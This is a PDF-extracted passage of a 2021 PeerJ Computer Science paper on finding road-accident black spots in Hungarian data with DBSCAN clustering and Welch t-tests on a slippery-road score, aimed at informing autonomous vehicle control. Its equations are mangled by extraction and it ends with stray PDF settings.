where Si(x) is the score value of the Ri reason for accident x. The x.y corresponds to the value of the specific y attribute of the x accident, and AðxÞcontains all the available known attributes of x. It is also possible to calculate the same value, not just for an accident but also for all accidents of a black spot candidate. The Hi(C) set contains all the Si(x) score values for all x accidents in the C cluster as visible in Eq. (4): HiðCÞ¼ fSiðxÞjx 2 Cg (4) Distribution of accident scores As a further step, it is necessary to determine that there is any significant reason which proves that the C set is a real hot spot or not. For a well-established decision, it is necessary to analyze all the accidents in the database to determine the main characteristics of the distributions of all R reasons. Based on these results, it is possible to compare the distributions of Hi(C) values for the examined C hot spot candidate and the reference Ĥi values for the whole accident database (D) for a given Ri reason Eq. (5). Ĥi ¼fSiðxÞjx 2 Dg (5) If the distributions of Hi(C) and Ĥi are the same, it is assumable that the Ri reason has no significant role in the accumulation of accidents. Otherwise, if these distributions differ Szénási (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.399 12/25 http://dx.doi.org/10.7717/peerj-cs.399 https://peerj.com/computer-science/ as the number Ri score values are higher in Hi(C) than in Ĥi, there may be some cause/causal relationship between them. Hypothesis tests can show if the mean value of a given accident reason score (Ri) in a given cluster is higher than the same mean for all accidents in the database. The used alternative hypothesis states that the mean score of the cluster minus the mean score of the whole population is greater than zero Eq. (7). The null hypothesis covers all other possible outcomes Eq. (6). H=j� : mC �mD � 0 (6) H=k� : mC �mD . 0 (7) where: � μC is the mean score value for the black spot candidate; � μD is the mean score value for all accidents in the database (full population). This article proposes the application of Welch’s t-test, which is a two-sample location test used to test the hypothesis that the means of two populations are equal (like the popular Student’s t-test, but Welch’s test is more reliable when sample sizes are significantly different and the variances are also unequal). The Welch’s test assumes that both populations have normal distributions. Nevertheless, in the case of moderately large samples and application of the one-tailed test, the t-tests are relatively robust to moderate violations of the normality assumption. In this case, the populations are large enough (the full population contains thousands of accidents and black spots also contain several accidents), and it also holds that the one-tailed test is the appropriate method because we are looking for clusters where the mean is significantly higher than in the entire population. Ahad & Yahaya (2014) shows that Welch’s test can cause Type I errors when the variances of the two populations differ and distributions are non-normal. In this case, the variances are similar, and Type I errors are acceptable (some identified black spot candidates may not be real black spots). According to Welch’s method, the statistic t value is given by Eq. (8). t ¼ x1 �x2ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi v1 n1 þ v2 n2 r (8) where: � x1 is the mean of the first sample; � x2 is the mean of the second sample; � v1 is the variance of the first sample; � v2 is the variance of the second sample; � n1 is the size of the first sample; � n2 is the size of the second sample. Szénási (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.399 13/25 http://dx.doi.org/10.7717/peerj-cs.399 https://peerj.com/computer-science/ The degree of freedom (v) is calculated by Eq. (9) v ¼ � v1 n1 þ v2 n2 �2 v21 n21ðn1 �1Þ þ v 2 2 n22ðn2 �1Þ (9) Based on the previously calculated t and v values, the t-distribution can be used to determine the probability (P). The one-tailed test is applied because it will answer the question that the mean of the cluster is significantly higher than the mean of the entire population. Based on P and a previously defined level of significance (a) it is possible to reject or not the null hypothesis. In the case of rejection, it can be assumed that the examined accident reason is related to the accidents as one of the possible causal factors. If the null hypothesis cannot be rejected, there is no evidence for this. Scoring factors The practical evaluation presented by this paper focuses on one specific accident reason (N = 1) the slippery road condition factor (R1). The used accident database contains more than two hundred fields, in four categories: � general accident attributes (date and time, location, nature, etc.); � general environmental attributes (weather conditions, visibility, etc.); � data about participants (was it a vehicle or pedestrian, speed, direction, etc.); � data about injured persons (age of the injured person, etc.). Weighting tables have been developed to estimate the effect of a given accident reason factor on the occurrence of the accident. It is possible to distinguish the following three type of accident properties, focusing on the slippery road condition accident factor: � Some fields directly contain information about the examined factor. In this case, the “Road surface” property (abbreviated as roadsrf) of an accident has an option of “4-oily, slippery”. This is taken as the basis for further weights; the score value of this attribute is 1.0 (W1roadsrf = 4 = 1.0), showing that the accident is highly affected by the slippery road condition factor. It is worth noting that it is not efficient making a binary decision about the examined factor based on this value because there are other values (“3-snowy”, “5-another staining”) having similar effects. This is reflected in the weight values. � In some cases, there are no such direct fields, but it is possible to deduce information about a given factor from the already existing data. For example, in the case of the slippery road condition factor, the weather conditions (wthr property in the database) can help this process. In these cases, the score values assigned to different weather condition cases show an estimation of how much the given factor affected the occurrence of the accident. In the case of snowing (“6-snowy”), it would be higher Szénási (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.399 14/25 http://dx.doi.org/10.7717/peerj-cs.399 https://peerj.com/computer-science/ (W1wthr = 4 = 0.3) than for ideal conditions like “1-sunny” (W 1 wthr = 1 = 0). It is also considered that in the case of accident nature “31-Slipping, carving, overturning on the road”, the slippery road factor influenced the results (W1accnat = 32 = 0.2) � The last group contains the fields without any relation to the examined factor. For example, fields like “Age of the driver” do not affect the results. The weights for all values of these fields are consequently zero. The Supplemental File “Scoring tables” contains the given weight values for the affected fields. Weight values are based on a comprehensive literature review from the fields of road safety and road friction measurements (Wallman & Åström, 2001; Andersson et al., 2007; Sokolovskij, 2010; Colomb, Duthon & Laukkanen, 2017). However, some of the values are affected by the subjective experiments of the authors. It should take some further research to determine the most efficient weights. RESULTS Accident database This paper uses the official road accident database of Hungary, where data regarding accidents with personal injury are collected by the police. After some conversion and corrections, this dataset is handled by the Central Statistics Department. The completeness of the database is ensured by legislation, and participants of public road accidents with personal injury are obliged to report it to the police. A police officer starts the data collection on the spot by recording the most relevant data about the location and the main attributes of the accidents (participants, casualties, etc.). After 30 days, it is possible to refine the final injury level for all participants. After that finalization step, the Central Statistics Department collects and rechecks all records. Road safety engineers and researchers can use this database for their work. The evaluation part of this paper is based on the accidents of this database from 1 January 2011 to 31 December 2018. It contains 128,767 accidents with personal injury classified into three categories: fatal, serious and slight. There are no accidents in the database without personal injury. Because of the high number of accidents and high computational demand of the clustering algorithm, this paper deals with two counties of Hungary: accidents of “Győr-Moson-Sopron” county was used to find the optimal parameters of the algorithm and “Heves” county was used as a control dataset. DBSCAN clustering The input database for the clustering was the personal injury accidents of a given county of Hungary (“Győr-Moson-Sopron” county). This experiment was performed twice at two consecutive time intervals to measure the robustness of the method. The examined t interval contains the accidents which occurred in 1 January 2011–31 December 2014. and the t̂ validation interval was 1 January 2015–1 December 2018. The number of accidents was 3,256 in the t interval (the D set contains these accidents) and 3,011 in the t̂ interval (the D̂ set contains these accidents). Szénási (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.399 15/25 http://dx.doi.org/10.7717/peerj-cs.399#supplemental-information http://dx.doi.org/10.7717/peerj-cs.399 https://peerj.com/computer-science/ In the hot spot search phase, the following DBSCAN parameters were used: � ε value: 100 m; � minimum accident count: five accidents; � minimum accident density: 0.0001 accident/m2. The result of this raw DBSCAN clustering method was 165 black spot candidates in the t interval and 152 black spot candidates in the t̂ interval. Statistical test Unlike traditional black spot searching methods, the next step is not the calculation of some safety potential index, but the determination of the different accident reason factors using the scoring method presented in Section. Considering the R1 slippery road condition factor, the S1(x) value is calculated for all x accidents. Most of these are not related to a slippery road surface reasons; so, S1 value for these is 0. As a prerequisite for the Welch-test, a population of Si(y) values is generated where y stands for all accidents in the database. The main parameters of this sample are: � number of items (n1): 3,256 � mean (x1): 0.2438 � variance (v1): 0.1115 It is possible to calculate these values for all of them, iterating the overall black spot candidates. Based on the whole population comparison and the black spot candidates, the Welch-test was applied to get the statistical result values. According to the Welch-test, it is possible to use the Student distribution with these parameters and the given level of significance (a = 0.05) to reject the null hypothesis or not. Table 1 shows the black spot candidates of the t interval where the null hypothesis was rejected because the mean of the R1 score for the given black spot candidate was significantly higher than the expected average. It can be assumed that these black spots are affected by the examined R1 factor. Figure 1 shows the environment and the accidents of the first black spot from this list. As is visible in the satellite image, it is a part of a long straight road; consequently, there is no reason for the autonomous car to decrease its speed. From the historical database, Table 2 contains detailed information about the accidents. As is visible, there is a high number of accidents affected by one or more slippery road-related attributes. This pattern Table 1 Accident black spots where the null hypothesis was rejected. # Location Count Mean Variance Prob. 1 LAT 47.6301/LON 16.7333 8 0.75 0.0857 0.000878 2 LAT 47.5956/LON 17.5872 11 0.55 0.0887 0.003629 3 LAT 47.3866/LON 17.8659 5 1.12 0.2820 0.010502 4 LAT 47.5708/LON 17.5790 6 0.56 0.1307 0.040157 Szénási (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.399 16/25 http://dx.doi.org/10.7717/peerj-cs.399 https://peerj.com/computer-science/ significantly differs from the expectations; hence, there should be some environmental issues at this location. The examination and elimination of these reasons is the task of road safety experts (Orosz et al., 2015). Nevertheless, until then, it is worth taking preventive steps to decrease the chance of further accidents. The autonomous vehicle should adapt its control to this situation (speed reduction, using safer trajectory, etc.). DISCUSSION There is not any generally accepted method for the evaluation of black spots because there is not an exact definition for these. Based on real-world accident data, there is not any Figure 1 Road accidents of the black spot located at LAT 47.6301/LON 16.7333. Map Data @2021 Google, Satellite Images @2021 CNES/Airbus, Geoimage Austria, Maxar Technologies. Full-size DOI: 10.7717/peerj-cs.399/fig-1 Table 2 Accidents of the black spot located at LAT 47.6301 / LON 16.7333. Time Latitude Longitude Outcome Surface Weather Accident nature 2011.02.03 16:05 47.6302 16.7327 Light Wet Sunny Track leaving 2011.05.06 17:35 47.6298 16.7340 Hard Normal Sunny Track leaving 2011.06.26 10:24 47.6300 16.7338 Light Wet Rainy Track leaving 2011.06.26 10:28 47.6300 16.7334 Hard Wet Rainy Track leaving 2011.07.21 9:10 47.6302 16.7330 Hard Wet Rainy Track leaving 2013.06.24 17:50 47.6298 16.7340 Light Wet Overcast Frontal crash 2014.01.09 12:45 47.6301 16.7330 Light Wet Sunny Slipping, carving 2014.01.20 10:45 47.6303 16.7325 Hard Wet Overcast Track leaving Szénási (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.399 17/25 http://dx.doi.org/10.7717/peerj-cs.399/fig-1 http://dx.doi.org/10.7717/peerj-cs.399 https://peerj.com/computer-science/ list of real black spots. So, the widely accepted confusion table-based methods are not usable here (assigning the clusters into true-positive, false-positive, true-negative, false- negative classes and calculating the common measurements like accuracy, recall, etc.). Therefore, it is necessary to evaluate these results based on the general characteristics of these locations. The accident density of black spots is significantly higher than the average; though, this is just a necessary condition but not sufficient for validity. Because of the high volatility of accidents, the regression to the mean effect can distort the results. It is a well-known statistical phenomenon that roads with a high number of road accidents in a particular period are likely to have fewer during the consecutive period just because of the random fluctuations in crash numbers. In the case of real black spots, the high number of accidents is permanent. Thus, it should be a good evaluation technique to check the number of accidents of the consecutive validation time interval inside the clusters identified in the t interval. There are specific tests for this purpose introduced by Cheng & Washington (2005) used by various article (Montella, 2010): site consistency tests, method consistency tests, and the total rank differences test. Since these are developed for black spot searching methods based on road intervals, it was necessary to adapt them to use spatial coordinates and black spot regions. The input series for all tests were the result of the previous black spot identification process, as � Ci is the i-th cluster identified in the D database (1 ≤ i ≤ n where n is the number of identified black spots in the t interval); � Ĉi is the i-th cluster identified in the D̂ database (1 � i � n̂ where n̂ is the number of identified black spots in the t̂ interval). Site consistency test This test assumes that any site identified as a black spot in the t time period should also reveal high risk in the subsequent t̂ time period. Let p(C) the convex boundary polygon of the C cluster given by the algorithm presented in Section, and p is the union of these regions identified in the t time period (10). � ¼ [n i¼1 �ðCiÞ (10) As the next step, we collect all accidents for the consecutive t̂ time period, which are inside the clusters identified by the prior t time period. The T1 attribute shows the number of these accidents divided by the summarized area of these clusters. Thus, this is the accident density of these clusters in the consecutive time period Eq. (11). T1 ¼ jfx 2 D̂jx inside �gjPn i¼1 aðCiÞ (11) Szénási (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.399 18/25 http://dx.doi.org/10.7717/peerj-cs.399 https://peerj.com/computer-science/ Accident reason factor consistency test As this paper goes further, revealing the accident reason factors, it is also worth checking if the accidents in the t̂ time period inside the region identified by the t time period have the same attributes or not. This leads to the introduction of the T′1 value, which shows the average score value for these accidents Eq. (12). T01 ¼ P 8x2D̂ � S1ðxÞ; if x inside � 0; else jfx 2 D̂jx inside �gj (12) Method consistency test It is also assumable that a black spot area identified in the t time period will also be identified as black spot in the consecutive t̂ time period. A given black spot searching method can be considered consistent if the number of a black spots identified in both periods is large. Meanwhile, that of black spots identified only in one of the examined periods is small. It is possible to use Eq. (13) to calculate this method consistency: T2 ¼ jfC1; C2; . . . Cng\fĈ1; Ĉ2; . . . Ĉn̂gj jfC1; C2; . . . Cng4fĈ1; Ĉ2; . . . Ĉn̂gj (13) where T2 is the ratio of the number of clusters existing in both search results and the number of clusters given by only the search in t or only in t̂ time period (△ stands for the symmetric difference of sets). A pair of clusters from the t and t̂ period considered identical if the distance between these is less than 300 m. Rank difference test The rank difference test is based on black spots identified in both the t and t̂ periods. The black spots of both periods are sorted by accident density, and the rank difference test shows the difference in the positions of the same cluster in the two lists. The smaller the value, the more consistent the examined method is, because the sequence of clusters is similar. Large numbers shows that the examined method was able to identify the same black spot in both intervals but with a different severity related to each other. Let O and Ô the sequences of black spots identified in both periods (both sequences contain the items of thefC1; C2; . . . Cng\fĈ1; Ĉ2; . . . Ĉn̂g set) ordered by accident density in the t time period (O) and in the t̂ time period (Ô). The T3 will show the rank difference of the examined method Eq. (14). Obviously jOj ¼ jÔj. T3 ¼ P c2O jRankðc; OÞ�Rankðc; ÔÞj jOj (14) where Rank(x, Y) is the rank of the x black spot in the Y sequence. Evaluation results First, the proposed method was compared to the traditional Sliding Window method (SW) using dynamic window length. The minimal window length parameter was 250 m, the Szénási (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.399 19/25 http://dx.doi.org/10.7717/peerj-cs.399 https://peerj.com/computer-science/ minimal accident number was 5, and the minimal accident density was 0.01 accidents/m. As a further step, the novel method was also compared to the raw DBSCAN based clustering (without the accident factor scoring). The parameters of this were the same as presented above. The proposed method is presented in the comparison under the DARF (DBSCAN with Accident Reason Factor determination) name. Table 3 shows the overall results for “Győr-Moson-Sopron” county. As visible, the number of black spots recognized by the DARF method is significantly less than by its alternatives. It was expected because the SW and DBSCAN methods list all clusters where the accident density is higher than a given threshold. In contrast, the DARF method results in only black spots affected by the R1 accident factor. The difference between the SW and DBSCAN is also significant and is caused by the fact that the SW uses road name + road section positioning which is not available in built-up areas. In comparison, the DBSCAN method is based on GPS coordinates and can find the black spots of municipal roads (which is one advantage of this approach). The T1 result is similar in the case of DBSCAN and DARF methods and it is significantly less in the case of SW. The T2 results are almost the same for all algorithms. The third general metric shows that the proposed method performs very well on the rank difference test. However, it is worth noting that the number of black spots is significantly less in this case, which can be an advantage. The T′1 metric shows the real strength of the proposed method. As expected, black spots identified by the SW and DBSCAN contain a mixture of various accidents. Consequently, the average of the R1 score is near to the mean of the population (0.2159 and 0.1922 compared to 0.2438). Contrary to this, the score number for the accidents of the t̂ time interval placed inside the clusters located by the data of the t interval is 0.62, which is significantly higher than the average. These results confirm that the proposed method has very similar characteristics to the already existing methods. The slightly lower T2 value shows that as a raw black spot searching algorithm, it is not as robust as the alternatives. Nonetheless, the T′1 result shows Table 3 Results of the comparison of the SW, DBSCAN, and DARF methods based on the road slippery condition. Precision is the ratio of the number of confirmed black spots (identified in both intervals) and the number of all black spots (identified at least in one of the intervals). Results are based on the personal injury accidents occured in “Győr-Moson-Sopron” county. Value SW DBSCAN DARF BS identified in both t and t̂ 67 129 4 BS identified in t but not in t̂ 8 36 2 BS identified in t̂ but not in t 20 23 0 Precision 41.36% 40.69% 40.00% T1 test result (accidents/m) 0.0094 0.0435 0.0447 T′1 test result 0.2159 0.1922 0.6200 T2 test result 0.5447 0.5223 0.5000 T3 test result 3.8765 5.9054 0.2000 Szénási (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.399 20/25 http://dx.doi.org/10.7717/peerj-cs.399 https://peerj.com/computer-science/ that it is satisfactory for our purpose. It can localize areas when the expected number of accidents with given accident reasons is significantly higher than the average. Table 4 shows the same values for another county (“Heves”) as a control dataset to check the robustness of the method. As visible, the main characteristics of the results are very similar. In this case, the T1 and T3 results are better compared to the alternatives. However, the T′1 value is slightly lower, but still significantly higher than the population average. CONCLUSIONS This work presents a novel, fully automated method updating autonomous vehicles concerning potential road risk factors. The method is based on the DBSCAN data-mining algorithm, which can localize black spot candidates where the number of accidents is greater than expected. It has several advantages to the traditional sliding window method, especially in built-up areas and accidents occurred at junctions. Beyond the traditional road safety engineering work, an additional processing step was also introduced, making assumptions about the main accident reasons. All possible reasons (road slippery, pedestrian issues, etc.) should be checked one-by-one, assigning score values to all accidents. The proposed method considers the distribution of these score values for the full population (all accidents of the given county) and each black spot candidate. Using hypotheses tests (one-tailed Welch-test), it is possible to select clusters in which the mean of the score values is significantly higher than the expected value (calculated by statistical methods based on the entire accident database). These can be considered as black spots affected by the given factor. The output of this process is a sequence of risky locations on the public road network and a prediction concerning the accident reasons. These would be the base of further research suggesting automatic preventive steps to autonomous vehicles. This dataset can be useful in the route planning phase (try to avoid black spots) and in the traveling phase (take preventive steps when approaching dangerous locations) (Alonso et al., 2016). This knowledge would decrease the number and seriousness of public road accidents. Table 4 Results of the comparison of the SW, DBSCAN, and DARF methods based on the road slippery condition. Precision is the ratio of the number of confirmed black spots (identified in both intervals) and the number of all black spots (identified at least in one of the intervals). Results are based on the personal injury accidents are occured in “Heves” county. Value SW DBSCAN DARF BS identified in both t and t̂ 25 38 4 BS identified in t but not in t̂ 9 12 0 BS identified in t̂ but not in t 16 26 3 Precision 33.33% 33.33% 36.36% T1 test result (accidents/m) 0.0074 0.0323 0.0732 T′1 test result 0.2148 0.2286 0.5778 T2 test result 0.3333 0.3333 0.4000 T3 test result 1.8667 1.4912 0.0000 Szénási (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.399 21/25 http://dx.doi.org/10.7717/peerj-cs.399 https://peerj.com/computer-science/ As a limitation, it is worth noting that the proposed method would result in false positive alarms. Fortunately, these results are used by autonomous vehicles; therefore, the consequences are usually minor inconveniences (decreasing the speed, etc.) compared to the traditional road safety investigations, where the manual revision is essential. It is also worth seeing that our method is based only on local historical data resulting in problems typical of traditional statistical black spot searching methods (high variation compared to the expected value). It would be worth developing a hybrid method based on the Empirical Bayes method, which achieves superior control for random variation. The next step of this research project will be the development of these preventive steps. The previously acquired information should be built into the control of the self-driven vehicle to fine-tune its strategy of movement to avoid all predictable risky situations. For example, if the presented method predicts high probability of pedestrian accidents, the car should increase the engine voice volume; in the case of a high chance of frontal accidents, it is worth increasing the power of the headlights; and obviously, decreasing the speed near any of the dangerous locations may decrease the seriousness of most accidents. Building an expert system to give similar advice based on the historical data should be the next step of this project. Another direction of further development is to make the method more sensitive to real-time environmental conditions. For example, if the autonomous car has to plan a route at night in wet weather, then it should pay more attention to historical accidents that have occurred under similar conditions. This also confirms the fact that it is necessary to make simple and fully automatic algorithms for this purpose to make the fast recalculations available. As another further development, an Artificial Intelligence based approach should be used to extend the database to solve the problems raised by the limitations of the dataset. ACKNOWLEDGEMENTS The authors would like to thank Domokos Jankó for his support and novel ideas about the topic. Rest in peace our friend. ADDITIONAL INFORMATION AND DECLARATIONS Funding The research presented in this paper was carried out as part of the EFOP-3.6.2-16-2017- 00016 project in the framework of the New Széchenyi Plan. The completion of this project is funded by the European Union and co-financed by the European Social Fund. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: New Széchenyi Plan: EFOP-3.6.2-16-2017-00016. European Union and European Social Fund. Szénási (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.399 22/25 http://dx.doi.org/10.7717/peerj-cs.399 https://peerj.com/computer-science/ Competing Interests Sándor Szénási is an Academic Editor for PeerJ. Author Contributions � Sándor Szénási conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: Data and code are available in the Supplemental Files. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.399#supplemental-information. REFERENCES Ahad NA, Yahaya SSS. 2014. Sensitivity analysis of Welch’s t-test. AIP Conference Proceedings 1605(February 2015):888–893. Alonso F, Alonso M, Esteban C, Useche SA. 2016. Knowledge of the concepts of black spot, grey spot and high accident concentration sections among drivers. Science Publishing Group 1(4):39–46. Anderson TK. 2009. Kernel density estimation and K-means clustering to profile road accident hotspots. Accident Analysis & Prevention 41(3):359–364 DOI 10.1016/j.aap.2008.12.014. Andersson M, Bruzelius F, Casselgren J, Gäfvert M, Hjort M, Hultén J, Håbring F, Klomp M, Olsson G, Sjödahl M, Svendenius J, Woxneryd S, Wälivaara B. 2007. Road friction estimation IVSS project report. Available at https://research.chalmers.se/en/publication/101026. Bálint A, Fagerlind H, Kullgren A. 2013. A test-based method for the assessment of pre-crash warning and braking systems. Accident Analysis & Prevention 59:192–199 DOI 10.1016/j.aap.2013.05.021. Bíl M, Andrášik R, Janoška Z. 2013. Identification of hazardous road locations of traffic accidents by means of kernel density estimation and cluster significance evaluation. Accident Analysis & Prevention 55(3):265–273 DOI 10.1016/j.aap.2013.03.003. Carsten OM, Tate FN. 2005. Intelligent speed adaptation: accident savings and cost-benefit analysis. Accident Analysis & Prevention 37(3):407–416 DOI 10.1016/j.aap.2004.02.007. Chatterjee K, Hounsell NB, Firmin PE, Bonsall PW. 2002. Driver response to variable message sign information in London. Transportation Research Part C: Emerging Technologies 10(2):149–169 DOI 10.1016/S0968-090X(01)00008-0. Cheng W, Washington SP. 2005. Experimental evaluation of hotspot identification methods. Accident Analysis & Prevention 37(5):870–881 DOI 10.1016/j.aap.2005.04.015. Colomb M, Duthon P, Laukkanen S. 2017. Characteristics of adverse weather conditions. In: DENSE. Brussels: CER. Delorme R, Lassarre S. 2014. A new theory of complexity for safety research—the case of the long-lasting gap in road safety outcomes between France and Great Britain. Safety Science 70:488–503 DOI 10.1016/j.ssci.2014.06.015. Szénási (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.399 23/25 http://dx.doi.org/10.7717/peerj-cs.399#supplemental-information http://dx.doi.org/10.7717/peerj-cs.399#supplemental-information http://dx.doi.org/10.7717/peerj-cs.399#supplemental-information http://dx.doi.org/10.1016/j.aap.2008.12.014 https://research.chalmers.se/en/publication/101026 http://dx.doi.org/10.1016/j.aap.2013.05.021 http://dx.doi.org/10.1016/j.aap.2013.03.003 http://dx.doi.org/10.1016/j.aap.2004.02.007 http://dx.doi.org/10.1016/S0968-090X(01)00008-0 http://dx.doi.org/10.1016/j.aap.2005.04.015 http://dx.doi.org/10.1016/j.ssci.2014.06.015 http://dx.doi.org/10.7717/peerj-cs.399 https://peerj.com/computer-science/ Elvik R. 2008. A survey of operational definitions of hazardous road locations in some European countries. Accident Analysis & Prevention 40(6):1830–1835 DOI 10.1016/j.aap.2008.08.001. Flahaut B, Mouchart M, Martin ES, Thomas I. 2003. The local spatial autocorrelation and the kernel method for identifying black zones. Accident Analysis & Prevention 35(6):991–1004 DOI 10.1016/S0001-4575(02)00107-0. Geurts K, Wets G, Brijs T, Vanhoof K, Karlis D. 2006. Ranking and selecting dangerous crash locations: correcting for the number of passengers and Bayesian ranking plots. Journal of Safety Research 37(1):83–91 DOI 10.1016/j.jsr.2005.10.020. Ghadi M, Török Á. 2019. A comparative analysis of black spot identification methods and road accident segmentation methods. Accident Analysis & Prevention 128:1–7 DOI 10.1016/j.aap.2019.03.002. Harper CD, Hendrickson CT, Samaras C. 2016. Cost and benefit estimates of partially-automated vehicle collision avoidance technologies. Accident Analysis & Prevention 95:104–115 DOI 10.1016/j.aap.2016.06.017. Hegyi P, Borsos A, Koren C. 2017. Searching possible accident black spot locations with accident analysis and GIS software based on GPS coordinates. Pollack Periodica 12(3):129–140 DOI 10.1556/606.2017.12.3.12. Hossain M, Abdel-Aty M, Quddus MA, Muromachi Y, Sadeek SN. 2019. Real-time crash prediction models: state-of-the-art, design pathways and ubiquitous requirements. Accident Analysis & Prevention 124:66–84 DOI 10.1016/j.aap.2018.12.022. Jermakian JS. 2011. Crash avoidance potential of four passenger vehicle technologies. Accident Analysis & Prevention 43(3):732–740 DOI 10.1016/j.aap.2010.10.020. Kertesz G, Felde I. 2020. One-shot re-identification using image projections in deep triplet convolutional network. In: SOSE, 2020—IEEE 15th International Conference of System of Systems Engineering, Proceedings. Piscataway: IEEE, 597–601. Lee S, Lee Y. 2013. Calculation method for sliding-window length: a traffic accident frequency case study. Easter Asia Society for Trasportation Studies 9:1–13. Lenard J, Badea-Romero A, Danton R. 2014. Typical pedestrian accident scenarios for the development of autonomous emergency braking test protocols. Accident Analysis & Prevention 73(4):73–80 DOI 10.1016/j.aap.2014.08.012. Mauro R, De Luca M, Dell’Acqua G. 2013. Using a k-means clustering algorithm to examine patterns of vehicle crashes in before-after analysis. Modern Applied Science 7(10):11–19. Montella A. 2010. A comparative analysis of hotspot identification methods. Accident Analysis & Prevention 42(2):571–581 DOI 10.1016/j.aap.2009.09.025. Montella A, Andreassen D, Tarko AP, Turner S, Mauriello F, Imbriani LL, Romero MA. 2013. Crash databases in Australasia, the European Union, and the United States. Transportation Research Record: Journal of the Transportation Research Board 2386(1):128–136 DOI 10.3141/2386-15. Murray W, White J, Ison S. 2012. Work-related road safety: a case study of Roche Australia. Safety Science 50(1):129–137 DOI 10.1016/j.ssci.2011.07.012. Nitsche P, Thomas P, Stuetz R, Welsh R. 2017. Pre-crash scenarios at road junctions: a clustering method for car crash data. Accident Analysis & Prevention 107:137–151 DOI 10.1016/j.aap.2017.07.011. Orosz G, Mocsári T, Borsos A, Koren C. 2015. Evaluation of low-cost safety measures on the Hungarian national road network. In: Proceedings of the XXVth World Road Congress, Seoul: World Road Association, 1–11. Szénási (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.399 24/25 http://dx.doi.org/10.1016/j.aap.2008.08.001 http://dx.doi.org/10.1016/S0001-4575(02)00107-0 http://dx.doi.org/10.1016/j.jsr.2005.10.020 http://dx.doi.org/10.1016/j.aap.2019.03.002 http://dx.doi.org/10.1016/j.aap.2016.06.017 http://dx.doi.org/10.1556/606.2017.12.3.12 http://dx.doi.org/10.1016/j.aap.2018.12.022 http://dx.doi.org/10.1016/j.aap.2010.10.020 http://dx.doi.org/10.1016/j.aap.2014.08.012 http://dx.doi.org/10.1016/j.aap.2009.09.025 http://dx.doi.org/10.3141/2386-15 http://dx.doi.org/10.1016/j.ssci.2011.07.012 http://dx.doi.org/10.1016/j.aap.2017.07.011 http://dx.doi.org/10.7717/peerj-cs.399 https://peerj.com/computer-science/ Rosén E, Källhammer JE, Eriksson D, Nentwich M, Fredriksson R, Smith K. 2010. Pedestrian injury mitigation by autonomous braking. Accident Analysis & Prevention 42(6):1949–1957 DOI 10.1016/j.aap.2010.05.018. Sokolovskij E. 2010. Automobile braking and traction characteristics on the different road surfaces. Transport 22(4):275–278 DOI 10.3846/16484142.2007.9638141. Szénási S, Jankó D. 2007. Internet-based decision-support system in the field of traffic safety on public road networks. In: 6th European Transport Conference. Budapest, 131–136. Toran A, Moridpour S. 2015. Identifying crash black spots in melbourne road network using kernel density estimation in GIS. In: Road Safety and Simulation. Wallman C-G, Åström H. 2001. Friction measurement methods and the correlation between road friction and traffic safety: a literature review. Available at https://books.google.hu/books? id=VL9BHQAACAAJ. Yu H, Liu P, Chen J, Wang H. 2014. Comparative analysis of the spatial analysis methods for hotspot identification. Accident Analysis & Prevention 66(2083):80–88 DOI 10.1016/j.aap.2014.01.017. Szénási (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.399 25/25 http://dx.doi.org/10.1016/j.aap.2010.05.018 http://dx.doi.org/10.3846/16484142.2007.9638141 https://books.google.hu/books?id=VL9BHQAACAAJ https://books.google.hu/books?id=VL9BHQAACAAJ http://dx.doi.org/10.1016/j.aap.2014.01.017 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.399 Analysis of historical road accident data supporting autonomous vehicle control strategies Introduction Background Materials and Methods Results Discussion Conclusions flink7 References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> 